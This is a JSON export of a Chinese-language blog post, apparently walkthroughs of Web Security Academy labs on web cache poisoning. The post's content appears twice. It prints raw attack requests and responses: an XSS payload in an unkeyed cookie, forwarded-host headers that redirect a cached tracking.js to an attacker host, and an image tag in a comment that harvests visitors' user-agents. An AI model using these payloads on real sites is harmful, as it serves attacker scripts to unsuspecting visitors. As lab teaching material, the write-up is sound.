<\/p>\n\n\n\n
\u95dc\u65bc\u5feb\u53d6\u6295\u6bd2\u7684\u4ecb\u7d39\u53ef\u53c3\u8003<\/p>\n\n\n\n\nweb cache poisioning<\/a><\/blockquote><\/iframe>\n<\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4f7f\u7528header\u5feb\u53d6\u6295\u6bd2\u7684\u653b\u64ca\u65b9\u5f0f\uff0c\u5e38\u898b\u6709\u4ee5\u4e0b\u5e7e\u7a2e\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5c0dcookie\u6295\u6bd2<\/li>\n\n\n\n<li>\u642d\u914d\u591a\u500b\u96b1\u85cf\u53c3\u6578\u6295\u6bd2<\/li>\n\n\n\n<li>\u53c3\u8003vary header\u9032\u884c\u6295\u6bd2<\/li>\n<\/ul>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5c0dcookie\u6295\u6bd2<\/h2>\n\n\n\n<p>\u76ee\u6a19\u4f7f\u7528cookie\u4e2d\u7684language\u4f86\u8abf\u6574\u7db2\u7ad9\u7684\u8a9e\u8a00\uff0c\u800c\u4e14\u6e2c\u8a66\u5f8c\u767c\u73fecookie\u662f<code>unkeyed header<\/code><\/p>\n\n\n\n<p>\u91dd\u5c0dcookie\u6e2c\u8a66\u5f8c\u767c\u73fefehost\u5167\u5bb9\u6703\u5f71\u97ff\u8fd4\u56de\u7d50\u679c\uff0c\u8acb\u6c42cookie\u5167\u7684fehost=prod-cache-01\uff0c\u6703\u5728\u8fd4\u56de\u7d50\u679c\u51fa\u73fe”frontend”:”prod-cache-01″<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>######## normal request ########\nGET \/ HTTP\/1.1\n...omit...\nCookie: session=7i0KrIGW9poQxsd5H6a8uBYuf1HvMnYL; fehost=prod-cache-01\n\n######## normal response ########\n...omit...\nCache-Control: max-age=30\nAge: 0\nX-Cache: miss\n...omit...\n <script>\n data = {\n \"host\":\"ac561f3b1eef788e80c7316300cc0076.web-security-academy.net\",\n \"path\":\"\/\",\n \"frontend\":\"prod-cache-01\"\n }\n <\/script>\n...omit...<\/code><\/pre>\n\n\n\n<p>\u56e0\u6b64\u53ea\u8981\u5c0dcookie\u5167\u7684fehost\u505a\u6c61\u67d3,\uff0c\u5c31\u53ef\u4ee5\u5be6\u73fe\u5feb\u53d6\u4e2d\u6bd2\u653b\u64ca<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>######## attack request ########\nGET \/ HTTP\/1.1\n...omit...\nCookie: session=7i0KrIGW9poQxsd5H6a8uBYuf1HvMnYL; fehost=someString\"-alert(1)-\"someString\n\n######## attack response ########\n...omit...\nCache-Control: max-age=30\nAge: 0\nX-Cache: miss\n...omit...\n <script>\n data = {\n \"host\":\"ac561f3b1eef788e80c7316300cc0076.web-security-academy.net\",\n \"path\":\"\/\",\n \"frontend\":\"someString\"-alert(1)-\"someString\"\n }\n <\/script>\n...omit...<\/code><\/pre>\n\n\n\n<p>\u572830\u79d2\u5167\u5982\u679c\u6709\u8a2a\u5ba2\u5b58\u53d6\u76f8\u540curl\uff0c\u5247\u8fd4\u56de\u7d50\u679c\u662f\u88ab\u6c61\u67d3\u7684\u9801\u9762<\/p>\n\n\n\n<p>lab: Web cache poisoning with an unkeyed cookie<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u642d\u914d\u591a\u500b\u96b1\u85cf\u53c3\u6578\u6295\u6bd2<\/h2>\n\n\n\n<p>\u6709\u6642\u5019\u662f\u75312\u500b\u96b1\u85cf\u53c3\u6578\u624d\u6703\u7522\u751f\u8fd4\u56de\u5167\u5bb9\u7684\u8b8a\u5316<\/p>\n\n\n\n<p>\u4ee5\u9019\u500b\u76ee\u6a19\u70ba\u4f8b\uff0c\u900f\u904eparam mining\u767c\u73fe\u4ee5\u4e0b2\u500b\u70ba\u96b1\u85cf\u53c3\u6578\uff0c\u800c\u4e14\u89c0\u5bdf\u767c\u73fe\u70ba <code>unkeyed header<\/code><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>X-Forwarded-Host\uff1a\u642d\u914dX-Forwarded-Scheme\u6642\uff0c\u9019\u500b\u503c\u4ee3\u8868\u65b0\u7db2\u5740<\/li>\n\n\n\n<li>X-Forwarded-Scheme\uff1a\u7576\u503c\u70bahttp:\/\/\u6703\u89f8\u767c302<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<p>\u53ea\u900f\u904eX-Forwarded-Host: example.net\uff0c\u770b\u4e0d\u51fa\u6709\u4ec0\u9ebc\u6548\u679c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/resources\/js\/tracking.js HTTP\/1.1\nHost: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net\nX-Forwarded-Host: example.net\n\n########## response ###########\nHTTP\/1.1 504 Gateway Timeout<\/code><\/pre>\n\n\n\n<p>\u53ea\u900f\u904eX-Forwarded-Scheme: http:\/\/\uff0c\u53ef\u770b\u5230\u6703\u51fa\u73fe302\uff0c\u5982\u679c\u63db\u6210https:\/\/\u5247\u4e0d\u6703\u6709\u8b8a\u5316<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/resources\/js\/tracking.js HTTP\/1.1\nHost: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net\nX-Forwarded-Scheme: http:\/\/\n...omit...\n\n########## response ###########\nHTTP\/1.1 302 Found\nLocation: https:\/\/ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net\/resources\/js\/tracking.js\n...omit...<\/code><\/pre>\n\n\n\n<p>\u4f46\u5982\u679c\u5408\u4f75\u4e0a\u8ff02\u500b\u96b1\u85cf\u53c3\u6578\uff0c\u5c31\u80fd\u69cb\u9020\u8f49\u5740\u7684\u8acb\u6c42<\/p>\n\n\n\n<p>\u53ea\u8981\u628a\u4e3b\u6a5f\u63db\u6210\u653b\u64ca\u8005\u4e3b\u6a5f\uff0c\u4e26\u5728\u653b\u64ca\u8005\u4e3b\u6a5f\u7684resources\/js\/tracking.js\u6e96\u5099\u60e1\u610f\u4ee3\u78bc\uff0c\u5c31\u53ef\u4ee5\u5c0d\u5feb\u53d6\u6295\u6bd2\uff0c\u5982\u4e0b <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/resources\/js\/tracking.js HTTP\/1.1\nHost: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net\nX-Forwarded-Host: attackwebsite\nX-Forwarded-Scheme: http:\/\/\n...omit...\n\n########## response ###########\nHTTP\/1.1 302 Found\nLocation: attackwebsite\/resources\/js\/tracking.js\nConnection: close\nCache-Control: max-age=30\nAge: 7\nX-Cache: hit<\/code><\/pre>\n\n\n\n<p>\u6295\u6bd2\u5f8c\u572830\u79d2\u5167\u5982\u679c\u6709\u8a2a\u5ba2\u5b58\u53d6resources\/js\/tracking.js\uff0c\u5247\u8fd4\u56de\u7d50\u679c\u662f\u653b\u64ca\u8005\u63d0\u4f9b\u7684resources\/js\/tracking.js<\/p>\n\n\n\n<p>lab: Web cache poisoning with multiple headers<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u53c3\u8003vary header\u9032\u884c\u6295\u6bd2<\/h2>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4ee5\u9019\u500b\u76ee\u6a19\u70ba\u4f8b\uff0c\u900f\u904eparam mining\u767c\u73fe\u4ee51\u500b\u96b1\u85cf\u53c3\u6578\u70baX-Host\uff0c\u800c\u4e14\u89c0\u5bdf\u767c\u73fe\u70ba <code>unkeyed header<\/code>\uff0c\u56e0\u6b64\u5c0d\u8a72\u53c3\u6578\u9032\u884c\u6295\u6bd2\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/ HTTP\/1.1\nHost: ac6d1f9e1ead800f80f628ab006a0084.web-security-academy.net\nX-Host: attackwebsite\n...omit...\n\n########## response ###########\n...omit...\nVary: user-agent\n...omit...\n<script type=\"text\/javascript\" src=\"\/\/attackwebsite\/resources\/js\/tracking.js\"><\/script>\n...omit...<\/code><\/pre>\n\n\n\n<p>\u4e0d\u904e\u9019\u88e1\u8981\u6ce8\u610f\u7684\u5730\u65b9\u662f\u8fd4\u56de\u5167\u5bb9\u6709vary: user-agent\uff0c\u9019\u4ee3\u8868user-agent\u662f<code>key header<\/code>\u3002\u63db\u53e5\u8a71\u8aaa\uff0c\u8a2a\u5ba2\u9664\u4e86\u8981\u5b58\u53d6\u76f8\u540chost\u5916\uff0cuser-agent\u4e5f\u5fc5\u9808\u8981\u4e00\u6a23\uff0c\u624d\u80fd\u8a2a\u554f\u5230\u88ab\u6c61\u67d3\u7684\u5feb\u53d6\u5167\u5bb9<\/p>\n\n\n\n<p>\u5728\u9019\u500b\u76ee\u6a19\u7db2\u7ad9\u4e2d\uff0c\u7559\u8a00\u5340\u5141\u8a31html\uff0c\u56e0\u6b64\u53ef\u4ee5\u900f\u904e\u9019\u500b\u65b9\u5f0f\uff0c\u53d6\u5f97\u6bcf\u500b\u8a2a\u5ba2\u7684user-agent<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><img src=\"https:\/\/attackwebsite\/foo\" \/><\/code><\/pre>\n\n\n\n<p>\u8a2a\u5ba2\u4e00\u4f46\u770b\u5230\u7559\u8a00\uff0c\u5c31\u6703\u89f8\u767c\u8a72html\uff0c\u53ea\u8981\u5230attackwebsite\u770b\u7db2\u9801\u65e5\u5fd7\u8a18\u9304\uff0c\u4fbf\u80fd\u770b\u5230\u8a2a\u5ba2\u7684user-agent<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>172.31.30.128 2023-09-18 08:40:09 +0000 \"GET \/foo HTTP\/1.1\" 404 \"User-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.149 Safari\/537.36\"<\/code><\/pre>\n\n\n\n<p>\u53d6\u5f97user-agent\u70ba<code>Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.149 Safari\/537.36<\/code>\u5f8c\uff0c\u5c31\u53ef\u4ee5\u91cd\u65b0\u69cb\u9020\u4e00\u500b\u6295\u6bd2\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/ HTTP\/1.1\nHost: ac6d1f9e1ead800f80f628ab006a0084.web-security-academy.net\nX-Host: attackwebsite\nConnection: close\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.149 Safari\/537.36\n...omit...\n\n########## response ###########\n...omit...\n<script type=\"text\/javascript\" src=\"\/\/attackwebsite\/resources\/js\/tracking.js\"><\/script>\n...omit...<\/code><\/pre>\n\n\n\n<p>\u572830\u79d2\u5167\u5982\u679c\u6709\u8a2a\u5ba2\u8a2a\u554f\u76f8\u540c\u7684host\uff0c\u4e26\u4f7f\u7528\u76f8\u540c\u7684user-agent\uff0c\u5247\u8fd4\u56de\u7d50\u679c\u662f\u88ab\u6c61\u67d3\u7684\u9801\u9762<\/p>\n\n\n\n<p>Lab: Targeted web cache poisoning using an unknown header<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u95dc\u65bc\u5feb\u53d6\u6295\u6bd2\u7684\u4ecb\u7d39\u53ef\u53c3\u8003 \u4f7f\u7528header\u5feb\u53d6\u6295\u6bd2\u7684\u653b\u64ca\u65b9\u5f0f …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[368],"tags":[],"class_list":["post-1129","post","type-post","status-publish","format-standard","hentry","category-operations"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1129","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1129"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1129\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1129"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1129"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1129"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
web cache poisioning<\/a><\/blockquote><\/iframe>\n<\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4f7f\u7528header\u5feb\u53d6\u6295\u6bd2\u7684\u653b\u64ca\u65b9\u5f0f\uff0c\u5e38\u898b\u6709\u4ee5\u4e0b\u5e7e\u7a2e\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u5c0dcookie\u6295\u6bd2<\/li>\n\n\n\n<li>\u642d\u914d\u591a\u500b\u96b1\u85cf\u53c3\u6578\u6295\u6bd2<\/li>\n\n\n\n<li>\u53c3\u8003vary header\u9032\u884c\u6295\u6bd2<\/li>\n<\/ul>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5c0dcookie\u6295\u6bd2<\/h2>\n\n\n\n<p>\u76ee\u6a19\u4f7f\u7528cookie\u4e2d\u7684language\u4f86\u8abf\u6574\u7db2\u7ad9\u7684\u8a9e\u8a00\uff0c\u800c\u4e14\u6e2c\u8a66\u5f8c\u767c\u73fecookie\u662f<code>unkeyed header<\/code><\/p>\n\n\n\n<p>\u91dd\u5c0dcookie\u6e2c\u8a66\u5f8c\u767c\u73fefehost\u5167\u5bb9\u6703\u5f71\u97ff\u8fd4\u56de\u7d50\u679c\uff0c\u8acb\u6c42cookie\u5167\u7684fehost=prod-cache-01\uff0c\u6703\u5728\u8fd4\u56de\u7d50\u679c\u51fa\u73fe”frontend”:”prod-cache-01″<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>######## normal request ########\nGET \/ HTTP\/1.1\n...omit...\nCookie: session=7i0KrIGW9poQxsd5H6a8uBYuf1HvMnYL; fehost=prod-cache-01\n\n######## normal response ########\n...omit...\nCache-Control: max-age=30\nAge: 0\nX-Cache: miss\n...omit...\n <script>\n data = {\n \"host\":\"ac561f3b1eef788e80c7316300cc0076.web-security-academy.net\",\n \"path\":\"\/\",\n \"frontend\":\"prod-cache-01\"\n }\n <\/script>\n...omit...<\/code><\/pre>\n\n\n\n<p>\u56e0\u6b64\u53ea\u8981\u5c0dcookie\u5167\u7684fehost\u505a\u6c61\u67d3,\uff0c\u5c31\u53ef\u4ee5\u5be6\u73fe\u5feb\u53d6\u4e2d\u6bd2\u653b\u64ca<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>######## attack request ########\nGET \/ HTTP\/1.1\n...omit...\nCookie: session=7i0KrIGW9poQxsd5H6a8uBYuf1HvMnYL; fehost=someString\"-alert(1)-\"someString\n\n######## attack response ########\n...omit...\nCache-Control: max-age=30\nAge: 0\nX-Cache: miss\n...omit...\n <script>\n data = {\n \"host\":\"ac561f3b1eef788e80c7316300cc0076.web-security-academy.net\",\n \"path\":\"\/\",\n \"frontend\":\"someString\"-alert(1)-\"someString\"\n }\n <\/script>\n...omit...<\/code><\/pre>\n\n\n\n<p>\u572830\u79d2\u5167\u5982\u679c\u6709\u8a2a\u5ba2\u5b58\u53d6\u76f8\u540curl\uff0c\u5247\u8fd4\u56de\u7d50\u679c\u662f\u88ab\u6c61\u67d3\u7684\u9801\u9762<\/p>\n\n\n\n<p>lab: Web cache poisoning with an unkeyed cookie<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u642d\u914d\u591a\u500b\u96b1\u85cf\u53c3\u6578\u6295\u6bd2<\/h2>\n\n\n\n<p>\u6709\u6642\u5019\u662f\u75312\u500b\u96b1\u85cf\u53c3\u6578\u624d\u6703\u7522\u751f\u8fd4\u56de\u5167\u5bb9\u7684\u8b8a\u5316<\/p>\n\n\n\n<p>\u4ee5\u9019\u500b\u76ee\u6a19\u70ba\u4f8b\uff0c\u900f\u904eparam mining\u767c\u73fe\u4ee5\u4e0b2\u500b\u70ba\u96b1\u85cf\u53c3\u6578\uff0c\u800c\u4e14\u89c0\u5bdf\u767c\u73fe\u70ba <code>unkeyed header<\/code><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>X-Forwarded-Host\uff1a\u642d\u914dX-Forwarded-Scheme\u6642\uff0c\u9019\u500b\u503c\u4ee3\u8868\u65b0\u7db2\u5740<\/li>\n\n\n\n<li>X-Forwarded-Scheme\uff1a\u7576\u503c\u70bahttp:\/\/\u6703\u89f8\u767c302<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<p>\u53ea\u900f\u904eX-Forwarded-Host: example.net\uff0c\u770b\u4e0d\u51fa\u6709\u4ec0\u9ebc\u6548\u679c<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/resources\/js\/tracking.js HTTP\/1.1\nHost: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net\nX-Forwarded-Host: example.net\n\n########## response ###########\nHTTP\/1.1 504 Gateway Timeout<\/code><\/pre>\n\n\n\n<p>\u53ea\u900f\u904eX-Forwarded-Scheme: http:\/\/\uff0c\u53ef\u770b\u5230\u6703\u51fa\u73fe302\uff0c\u5982\u679c\u63db\u6210https:\/\/\u5247\u4e0d\u6703\u6709\u8b8a\u5316<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/resources\/js\/tracking.js HTTP\/1.1\nHost: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net\nX-Forwarded-Scheme: http:\/\/\n...omit...\n\n########## response ###########\nHTTP\/1.1 302 Found\nLocation: https:\/\/ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net\/resources\/js\/tracking.js\n...omit...<\/code><\/pre>\n\n\n\n<p>\u4f46\u5982\u679c\u5408\u4f75\u4e0a\u8ff02\u500b\u96b1\u85cf\u53c3\u6578\uff0c\u5c31\u80fd\u69cb\u9020\u8f49\u5740\u7684\u8acb\u6c42<\/p>\n\n\n\n<p>\u53ea\u8981\u628a\u4e3b\u6a5f\u63db\u6210\u653b\u64ca\u8005\u4e3b\u6a5f\uff0c\u4e26\u5728\u653b\u64ca\u8005\u4e3b\u6a5f\u7684resources\/js\/tracking.js\u6e96\u5099\u60e1\u610f\u4ee3\u78bc\uff0c\u5c31\u53ef\u4ee5\u5c0d\u5feb\u53d6\u6295\u6bd2\uff0c\u5982\u4e0b <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/resources\/js\/tracking.js HTTP\/1.1\nHost: ac8e1f751eb8805a80bf121000c900b5.web-security-academy.net\nX-Forwarded-Host: attackwebsite\nX-Forwarded-Scheme: http:\/\/\n...omit...\n\n########## response ###########\nHTTP\/1.1 302 Found\nLocation: attackwebsite\/resources\/js\/tracking.js\nConnection: close\nCache-Control: max-age=30\nAge: 7\nX-Cache: hit<\/code><\/pre>\n\n\n\n<p>\u6295\u6bd2\u5f8c\u572830\u79d2\u5167\u5982\u679c\u6709\u8a2a\u5ba2\u5b58\u53d6resources\/js\/tracking.js\uff0c\u5247\u8fd4\u56de\u7d50\u679c\u662f\u653b\u64ca\u8005\u63d0\u4f9b\u7684resources\/js\/tracking.js<\/p>\n\n\n\n<p>lab: Web cache poisoning with multiple headers<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u53c3\u8003vary header\u9032\u884c\u6295\u6bd2<\/h2>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4ee5\u9019\u500b\u76ee\u6a19\u70ba\u4f8b\uff0c\u900f\u904eparam mining\u767c\u73fe\u4ee51\u500b\u96b1\u85cf\u53c3\u6578\u70baX-Host\uff0c\u800c\u4e14\u89c0\u5bdf\u767c\u73fe\u70ba <code>unkeyed header<\/code>\uff0c\u56e0\u6b64\u5c0d\u8a72\u53c3\u6578\u9032\u884c\u6295\u6bd2\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/ HTTP\/1.1\nHost: ac6d1f9e1ead800f80f628ab006a0084.web-security-academy.net\nX-Host: attackwebsite\n...omit...\n\n########## response ###########\n...omit...\nVary: user-agent\n...omit...\n<script type=\"text\/javascript\" src=\"\/\/attackwebsite\/resources\/js\/tracking.js\"><\/script>\n...omit...<\/code><\/pre>\n\n\n\n<p>\u4e0d\u904e\u9019\u88e1\u8981\u6ce8\u610f\u7684\u5730\u65b9\u662f\u8fd4\u56de\u5167\u5bb9\u6709vary: user-agent\uff0c\u9019\u4ee3\u8868user-agent\u662f<code>key header<\/code>\u3002\u63db\u53e5\u8a71\u8aaa\uff0c\u8a2a\u5ba2\u9664\u4e86\u8981\u5b58\u53d6\u76f8\u540chost\u5916\uff0cuser-agent\u4e5f\u5fc5\u9808\u8981\u4e00\u6a23\uff0c\u624d\u80fd\u8a2a\u554f\u5230\u88ab\u6c61\u67d3\u7684\u5feb\u53d6\u5167\u5bb9<\/p>\n\n\n\n<p>\u5728\u9019\u500b\u76ee\u6a19\u7db2\u7ad9\u4e2d\uff0c\u7559\u8a00\u5340\u5141\u8a31html\uff0c\u56e0\u6b64\u53ef\u4ee5\u900f\u904e\u9019\u500b\u65b9\u5f0f\uff0c\u53d6\u5f97\u6bcf\u500b\u8a2a\u5ba2\u7684user-agent<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code><img src=\"https:\/\/attackwebsite\/foo\" \/><\/code><\/pre>\n\n\n\n<p>\u8a2a\u5ba2\u4e00\u4f46\u770b\u5230\u7559\u8a00\uff0c\u5c31\u6703\u89f8\u767c\u8a72html\uff0c\u53ea\u8981\u5230attackwebsite\u770b\u7db2\u9801\u65e5\u5fd7\u8a18\u9304\uff0c\u4fbf\u80fd\u770b\u5230\u8a2a\u5ba2\u7684user-agent<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>172.31.30.128 2023-09-18 08:40:09 +0000 \"GET \/foo HTTP\/1.1\" 404 \"User-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.149 Safari\/537.36\"<\/code><\/pre>\n\n\n\n<p>\u53d6\u5f97user-agent\u70ba<code>Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.149 Safari\/537.36<\/code>\u5f8c\uff0c\u5c31\u53ef\u4ee5\u91cd\u65b0\u69cb\u9020\u4e00\u500b\u6295\u6bd2\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>########## request ###########\nGET \/ HTTP\/1.1\nHost: ac6d1f9e1ead800f80f628ab006a0084.web-security-academy.net\nX-Host: attackwebsite\nConnection: close\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/80.0.3987.149 Safari\/537.36\n...omit...\n\n########## response ###########\n...omit...\n<script type=\"text\/javascript\" src=\"\/\/attackwebsite\/resources\/js\/tracking.js\"><\/script>\n...omit...<\/code><\/pre>\n\n\n\n<p>\u572830\u79d2\u5167\u5982\u679c\u6709\u8a2a\u5ba2\u8a2a\u554f\u76f8\u540c\u7684host\uff0c\u4e26\u4f7f\u7528\u76f8\u540c\u7684user-agent\uff0c\u5247\u8fd4\u56de\u7d50\u679c\u662f\u88ab\u6c61\u67d3\u7684\u9801\u9762<\/p>\n\n\n\n<p>Lab: Targeted web cache poisoning using an unknown header<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u95dc\u65bc\u5feb\u53d6\u6295\u6bd2\u7684\u4ecb\u7d39\u53ef\u53c3\u8003 \u4f7f\u7528header\u5feb\u53d6\u6295\u6bd2\u7684\u653b\u64ca\u65b9\u5f0f …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[368],"tags":[],"class_list":["post-1129","post","type-post","status-publish","format-standard","hentry","category-operations"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1129","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1129"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1129\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1129"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1129"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1129"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}